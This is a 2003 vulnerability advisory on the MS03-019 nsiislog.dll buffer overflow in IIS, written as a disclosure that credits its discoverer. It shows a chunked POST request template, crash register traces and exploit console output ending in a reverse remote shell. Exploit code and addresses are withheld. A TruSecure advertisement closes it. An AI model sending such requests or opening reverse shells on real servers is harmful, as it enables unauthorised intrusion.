A long time ago, in a place far far away…
Well actually it was four months ago over here in New Zealand. Christmas
holidays had finished and I was half way through contemplating writing
a paper entitled 'The Methodical Approach To Finding Overflows'.
I thought I had better try out the concept behind this approach and the
issues discovered in nsiislog.dll are some of the results of it.
== MS03-019 states ==
Impact: Allow an attacker to execute code of their choice
Max Risk: Important
There is a flaw in the way in which nsiislog.dll processes incoming
requests. A vulnerability exists because an attacker could send specially
formed communications to the server that could cause IIS to stop responding
to Internet requests.
The vulnerability results because of an unchecked buffer used by the
nsiislog.dll file for logging. If a specially crafted request is sent to the
server, the logging file will attempt to write a larger buffer than is
possible,which then in turn causes the IIS service to fail.
== MS03-019 ==
== Description ==
Sending a chunked encoded post to nsiislog.dll will cause an access
violation
resulting in the following error log.
A chunked encoded post will result in the control of EAX and ECX, with
the exception ocurring at a mov dword ptr [ecx],eax instruction.
This allows remote command execution with privileges associated with the
IWAM_machinename account.
== Chunked Transfer-Encoding Post ==
POST /scripts/nsiislog.dll HTTP/1.1
Transfer-Encoding: chunked
PostLength
PostData
0
7800F5ED dec dword ptr [esi] ESI = 58585858
Using Size: 510
Connecting…Sending Buffer…
77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
ECX = 58585858
77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
ECX = 58585858
== Exploitation ==
The infamous 'mov dword ptr [ecx],eax' which allows an attacker to take
control by placing a value into a position that is later retrieved for the
EIP register.
In this case the exception was handled internally so execution flow could
not be obtained by taking advantage of SEH, but we were successful in
obtaining control by overwriting a portion of another 3 leter acronym.
== Exploit Example ==
%:\>exploit 192.168.1.63
IISNSLOG.DLL - 4.1.0.3920 - Remote Shell
. Calling Home: blackhole:2000
. Using: 0x########h as ABC overwrite
. Using: 0x########h as direct jump location
. Shellcode Size: 322 bytes
. Preparing Exploit Buffer…Ready
. Starting Listener On Port: 2000
. Connecting To Target
. Sending Exploit…Exploit Sent
. Connection Received
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
IWAM_BLACKHOLE
C:\WINNT\system32>
== Solutions ==
== Credit ==
Discovered and advised to Microsoft January 27, 2003 by Brett Moore.
%-) shutz to: eEye, spyrit and all kiwis with hackfu
%-) ha. we'll just say: "All of your livers are belong to us".
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Delivery co-sponsored by TruSecure
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
FREE 14-DAY TRIAL of New Threat & Vulnerability Notification Service
TruSecure's new IntelliShield(tm) web-based threat and vulnerability
service isn't your typical alert service. Supported by TruSecure's vast
intelligence resources - including the ICSA Labs - IntelliShield's early
warning, analysis, decision support, and threat management tools provide
organizations with unmatched intelligence to better protect critical
information assets. Experience it for yourself - just click below to begin
your FREE, NO OBLIGATION 14-day trial today!
http://www.trusecure.com/offer/s0074/
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo